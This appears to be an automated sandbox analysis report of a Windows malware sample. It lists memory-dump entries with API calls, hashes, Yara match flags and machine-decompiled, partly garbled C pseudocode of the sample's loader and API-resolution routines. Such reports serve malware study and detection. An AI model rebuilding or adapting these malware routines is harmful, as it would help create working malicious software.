                                                                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction ID: b7acdae8d3035396bf3a6cabd8be047a375e4a620bd0b44aa6ca3e6eeb15d15e
                                                                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction Fuzzy Hash: 35F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F810CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                          • Instruction ID: b02a98072ae76633dfac5978dec5414655e95fa3032167deae29744f36717898
                                                                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                          • Instruction Fuzzy Hash: B7D01776200214ABD710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: c08059c8d39986c266ec3b564c57194cb51267c14ad3a7dc0f58956e59467117
                                                                                                                          • Instruction ID: 2b00c330473683cdcf49ca9035436cfe5893d0128b37f70e722e3af19e02d915
                                                                                                                          • Opcode Fuzzy Hash: c08059c8d39986c266ec3b564c57194cb51267c14ad3a7dc0f58956e59467117
                                                                                                                          • Instruction Fuzzy Hash: 44900261B0100902D301716A4404616001A97D03C1F91C032A1014555ECE658992F171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E004082E8(void* __ecx, void* __esi, long _a8) {
                                                                                                                          				char _v63;
                                                                                                                          				char _v64;
                                                                                                                          				long __edi;
                                                                                                                          				void* __ebp;
                                                                                                                          				void* _t16;
                                                                                                                          
                                                                                                                          				_pop(ss);
                                                                                                                          				asm("bound eax, [ebx]");
                                                                                                                          				if(__esi + 1 >= 0) {
                                                                                                                          					_t16 = E0041B330(__ecx);
                                                                                                                          					if(_t16 == 0 || _t16 == 0x33333333) {
                                                                                                                          						__eflags = 0;
                                                                                                                          						return 0;
                                                                                                                          					} else {
                                                                                                                          						return  *_a8 + _t16;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					__eflags = __ecx;
                                                                                                                          					_push(__ebp);
                                                                                                                          					__ebp = __esp;
                                                                                                                          					__esp = __esp - 0x40;
                                                                                                                          					_push(__esi);
                                                                                                                          					__eax =  &_v63;
                                                                                                                          					_v64 = 0;
                                                                                                                          					__eax = E0041BA20( &_v63, 0, 0x3f);
                                                                                                                          					__ecx =  &_v64;
                                                                                                                          					__eax = E0041C5C0( &_v64, 3);
                                                                                                                          					_a8 = _a8 + 0x1c;
                                                                                                                          					__eax = E0040ACC0(__ebx, __eflags, _a8 + 0x1c,  &_v64); // executed
                                                                                                                          					__eax = E00414E10(_a8 + 0x1c, __eax, 0, 0, 0xc4e7b6d6);
                                                                                                                          					__esi = __eax;
                                                                                                                          					__eflags = __esi;
                                                                                                                          					if(__esi != 0) {
                                                                                                                          						_push(__edi);
                                                                                                                          						__edi = _a8;
                                                                                                                          						__eax = PostThreadMessageW(__edi, 0x111, 0, 0); // executed
                                                                                                                          						__eflags = __eax;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							__eax = E0040A450(__eflags, 1, 8);
                                                                                                                          							__eax = __al & 0x000000ff;
                                                                                                                          							__ecx = __ebp + __eax - 0x40;
                                                                                                                          							__eax =  *__esi(__edi, 0x8003, __ebp + __eax - 0x40, __eax);
                                                                                                                          						}
                                                                                                                          						_pop(__edi);
                                                                                                                          					}
                                                                                                                          					_pop(__esi);
                                                                                                                          					__esp = __ebp;
                                                                                                                          					_pop(__ebp);
                                                                                                                          					return __eax;
                                                                                                                          				}
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID: 3333
                                                                                                                          • API String ID: 1836367815-2924271548
                                                                                                                          • Opcode ID: 1c1fdf9ce575306d9f46668dd5bea2b6c3600d1bccfd3aee02544c7a1e1693d2
                                                                                                                          • Instruction ID: e3d37af9f4a3ae998a1a31596c42953fdc38290ff275a8c2d8b9ad50d5f4676e
                                                                                                                          • Opcode Fuzzy Hash: 1c1fdf9ce575306d9f46668dd5bea2b6c3600d1bccfd3aee02544c7a1e1693d2
                                                                                                                          • Instruction Fuzzy Hash: 0C112B316402187FEB20A6949D42FFE77589F41B50F08406EFE44BB2C1DA78A90147EA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oLA
                                                                                                                          • API String ID: 1279760036-3789366272
                                                                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction ID: 91a8afe93875cd4dd2c16ce4d21e80b139c6b658c845053945d21e38953d9919
                                                                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction Fuzzy Hash: F1E012B1200208ABDB14EF99DC41EA777ADAF88664F11855ABA085B242C630F910CBB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID: oLA
                                                                                                                          • API String ID: 1279760036-3789366272
                                                                                                                          • Opcode ID: 3d6703e194277b1ae2e8de4049c75e70dfff0c7056d4e725db8d9ccf5dfbc693
                                                                                                                          • Instruction ID: af225ebbf115edaa80c7d7cc310b5c55c013cba1dca817a18a305c20c7dcea64
                                                                                                                          • Opcode Fuzzy Hash: 3d6703e194277b1ae2e8de4049c75e70dfff0c7056d4e725db8d9ccf5dfbc693
                                                                                                                          • Instruction Fuzzy Hash: 4DD0C9B4204108AB8700EF59E8808AB736AAF88218711854AFC1943301C535E8618AB6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                          				char _v67;
                                                                                                                          				char _v68;
                                                                                                                          				void* _t12;
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				int _t14;
                                                                                                                          				long _t22;
                                                                                                                          				intOrPtr* _t26;
                                                                                                                          				void* _t27;
                                                                                                                          				void* _t31;
                                                                                                                          
                                                                                                                          				_t31 = __eflags;
                                                                                                                          				_v68 = 0;
                                                                                                                          				E0041BA20( &_v67, 0, 0x3f);
                                                                                                                          				E0041C5C0( &_v68, 3);
                                                                                                                          				_t12 = E0040ACC0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
                                                                                                                          				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                          				_t26 = _t13;
                                                                                                                          				if(_t26 != 0) {
                                                                                                                          					_t22 = _a8;
                                                                                                                          					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                                                                                                          					_t33 = _t14;
                                                                                                                          					if(_t14 == 0) {
                                                                                                                          						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A450(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                          					}
                                                                                                                          					return _t14;
                                                                                                                          				}
                                                                                                                          				return _t13;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                                                                                          • Instruction ID: dfcb319d37f54b0a0ecf43278dd58f432490a67f975cf55f4cf339e9819450c2
                                                                                                                          • Opcode Fuzzy Hash: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                                                                                          • Instruction Fuzzy Hash: 1A01A731A803287BE720A6A59C43FFF776C6B40F54F05411EFF04BA1C1E6A9691546FA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E0040ACB3(void* __eax, void* __ebx, void* __esi, char _a1, void* _a8, intOrPtr _a12) {
                                                                                                                          				char* _v4;
                                                                                                                          				struct _EXCEPTION_RECORD _v8;
                                                                                                                          				struct _OBJDIR_INFORMATION _v12;
                                                                                                                          				char _v532;
                                                                                                                          				signed int _t17;
                                                                                                                          				struct _OBJDIR_INFORMATION _t18;
                                                                                                                          				void* _t23;
                                                                                                                          				struct _OBJDIR_INFORMATION _t25;
                                                                                                                          				void* _t26;
                                                                                                                          				signed int* _t27;
                                                                                                                          				char* _t35;
                                                                                                                          				char* _t38;
                                                                                                                          				void* _t42;
                                                                                                                          				char* _t44;
                                                                                                                          
                                                                                                                          				_t26 = __ebx;
                                                                                                                          				_t17 = __eax - 0x5b;
                                                                                                                          				asm("in eax, 0x1f");
                                                                                                                          				ds = __esi;
                                                                                                                          				_t35 =  &_a1;
                                                                                                                          				_t44 = _t35;
                                                                                                                          				if(_t44 != 0) {
                                                                                                                          					L7:
                                                                                                                          					asm("cmpsb");
                                                                                                                          					 *_t27 =  *_t27 & _t17;
                                                                                                                          					_t7 = _t26 + 0x558b08c4;
                                                                                                                          					 *_t7 =  *((intOrPtr*)(_t26 + 0x558b08c4)) + _t17;
                                                                                                                          					__eflags =  *_t7;
                                                                                                                          					goto L8;
                                                                                                                          				} else {
                                                                                                                          					if(_t44 != 0) {
                                                                                                                          						L8:
                                                                                                                          						asm("les ecx, [eax]");
                                                                                                                          						goto L9;
                                                                                                                          					} else {
                                                                                                                          						asm("sbb [ebp-0x75], dl");
                                                                                                                          						_push(_t35);
                                                                                                                          						_t35 = _t38;
                                                                                                                          						_v4 =  &_v532;
                                                                                                                          						_t23 = E0041C810( &_v8, 0x104, _a12);
                                                                                                                          						_t42 = _t38 - 0x214 + 0xc;
                                                                                                                          						if(_t23 != 0) {
                                                                                                                          							_t25 = E0041CC30(__eflags, _v8);
                                                                                                                          							_t38 = _t42 + 4;
                                                                                                                          							__eflags = _t25;
                                                                                                                          							if(_t25 != 0) {
                                                                                                                          								_t27 =  &_v12;
                                                                                                                          								_t17 = E0041CEB0(_t27, 0);
                                                                                                                          								goto L7;
                                                                                                                          							}
                                                                                                                          							L9:
                                                                                                                          							_t18 = E0041B060(_v4);
                                                                                                                          							_v12 = _t18;
                                                                                                                          							__eflags = _t18;
                                                                                                                          							if(_t18 == 0) {
                                                                                                                          								LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
                                                                                                                          								_t18 = _v12;
                                                                                                                          							}
                                                                                                                          							return _t18;
                                                                                                                          						} else {
                                                                                                                          							return _t23;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}


















                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 6a1883fa3df364d00ab308787177eaaa5395b6c117eefb219030bb0774dce5ec
                                                                                                                          • Instruction ID: 8eb2301004882bfed2658affd43f0a5eeaebbd990e514aec3a06f004a3f8bdd8
                                                                                                                          • Opcode Fuzzy Hash: 6a1883fa3df364d00ab308787177eaaa5395b6c117eefb219030bb0774dce5ec
                                                                                                                          • Instruction Fuzzy Hash: 2201D875D4020DABCF10DBA4D881FDD77B5EF44318F1082EAE9099B251F235D65ACB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E0040ACC0(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                          				char* _v8;
                                                                                                                          				struct _EXCEPTION_RECORD _v12;
                                                                                                                          				struct _OBJDIR_INFORMATION _v16;
                                                                                                                          				char _v536;
                                                                                                                          				void* _t17;
                                                                                                                          				intOrPtr _t19;
                                                                                                                          				struct _OBJDIR_INFORMATION _t20;
                                                                                                                          				signed int _t25;
                                                                                                                          				signed int* _t29;
                                                                                                                          
                                                                                                                          				_v8 =  &_v536;
                                                                                                                          				_t17 = E0041C810( &_v12, 0x104, _a8);
                                                                                                                          				if(_t17 != 0) {
                                                                                                                          					_t19 = E0041CC30(__eflags, _v8);
                                                                                                                          					__eflags = _t19;
                                                                                                                          					if(_t19 != 0) {
                                                                                                                          						_t29 =  &_v12;
                                                                                                                          						_t25 = E0041CEB0(_t29, 0);
                                                                                                                          						asm("cmpsb");
                                                                                                                          						 *_t29 =  *_t29 & _t25;
                                                                                                                          						_t7 = __ebx + 0x558b08c4;
                                                                                                                          						 *_t7 =  *((intOrPtr*)(__ebx + 0x558b08c4)) + _t25;
                                                                                                                          						__eflags =  *_t7;
                                                                                                                          						asm("les ecx, [eax]");
                                                                                                                          					}
                                                                                                                          					_t20 = E0041B060(_v8);
                                                                                                                          					_v16 = _t20;
                                                                                                                          					__eflags = _t20;
                                                                                                                          					if(_t20 == 0) {
                                                                                                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                          						return _v16;
                                                                                                                          					}
                                                                                                                          					return _t20;
                                                                                                                          				} else {
                                                                                                                          					return _t17;
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                                                          • Instruction ID: f2ae6e5e7806921c9eae43ef0be609edf832a6aa20f0d9e7e2e66c408c20611a
                                                                                                                          • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                                                          • Instruction Fuzzy Hash: E40152B5D4020DABDB10DAE1DC82FDEB7789B14308F0041AAA908A7281F634EB54CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 19%
                                                                                                                          			E0041A262(void* __eax, void* __ecx, void* _a1, int _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				void* _v1;
                                                                                                                          				signed char _t15;
                                                                                                                          				signed char _t24;
                                                                                                                          				void* _t32;
                                                                                                                          				signed char* _t33;
                                                                                                                          
                                                                                                                          				_t24 = __ecx - 1;
                                                                                                                          				asm("fisub word [ebx+esi*8]");
                                                                                                                          				_t15 = _t24;
                                                                                                                          				asm("les edi, [edx+0x1b]");
                                                                                                                          				asm("fcomp3 st6");
                                                                                                                          				if(_t24 >= 0) {
                                                                                                                          					_push(_t32);
                                                                                                                          					_t20 = _v0;
                                                                                                                          					_push(_t33);
                                                                                                                          					_t33 = _v0 + 0xc7c;
                                                                                                                          					E0041AB20(_t32, _t20, _t33,  *((intOrPtr*)(_t20 + 0xa14)), 0, 0x36);
                                                                                                                          					_t28 = _a4;
                                                                                                                          					_t15 =  *_t33;
                                                                                                                          					ExitProcess(_a4);
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(__eax - 0x75)) =  *((intOrPtr*)(__eax - 0x75)) - _t28;
                                                                                                                          				return  *( *_t33)(_a12, _a16, _a20, _a24, _a28, _a32, __eax, _t15 & 0x00000052);
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: 4abe985106a79419cf1ec235fbccd1ea9952f58f99598e9530d47a1ee41f35d9
                                                                                                                          • Instruction ID: a7fe49d223b48750c27ab17b1d12878145246f7a98e041d23e66a3874a00bc26
                                                                                                                          • Opcode Fuzzy Hash: 4abe985106a79419cf1ec235fbccd1ea9952f58f99598e9530d47a1ee41f35d9
                                                                                                                          • Instruction Fuzzy Hash: A2018BB6200108ABC714DF98DC84EEB73ADEF88300F10815DBA5C9B642C634EA12CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 30%
                                                                                                                          			E0041A381(void* __edx, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				void* _v117;
                                                                                                                          				signed int _t8;
                                                                                                                          				void* _t11;
                                                                                                                          				int _t17;
                                                                                                                          				intOrPtr* _t18;
                                                                                                                          				void* _t25;
                                                                                                                          
                                                                                                                          				_push(cs);
                                                                                                                          				_t11 = (_t8 | 0x00000060) - 0xca695158;
                                                                                                                          				asm("wait");
                                                                                                                          				if(_t11 > 0) {
                                                                                                                          					return  *_t18(_t11, __edx, cs);
                                                                                                                          				} else {
                                                                                                                          					_t14 = _v0;
                                                                                                                          					E0041AB20(_t25, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t14 + 0xa18)), 0, 0x46);
                                                                                                                          					_t17 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                                                                                                                          					return _t17;
                                                                                                                          				}
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 9469479746c1abb94035fb50c7da2de63c6e60b7007db871f5e55df9f7e952b6
                                                                                                                          • Instruction ID: 62cc6e4f7d922e68cfd5948dcaec3ae9cc405c55fcfe40af2c058d69eb1ce2bb
                                                                                                                          • Opcode Fuzzy Hash: 9469479746c1abb94035fb50c7da2de63c6e60b7007db871f5e55df9f7e952b6
                                                                                                                          • Instruction Fuzzy Hash: 2AF0BEB12001483BDA10EF689C86EEB3B6ADF84764F018196FD1D97202CA35E95187B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A230(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                          				char _t10;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                          				E0041AB20(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                          				return _t10;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction ID: 9eb97300d5e10087c94d33d02e30a743291ab6cce32cf35ae9b88dc6f9268b02
                                                                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction Fuzzy Hash: 0EE01AB12002046BD714DF59DC45EA777ADAF88754F014559BA0857241C630F910CAB0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A390(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                          				int _t10;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				E0041AB20(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                          				return _t10;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
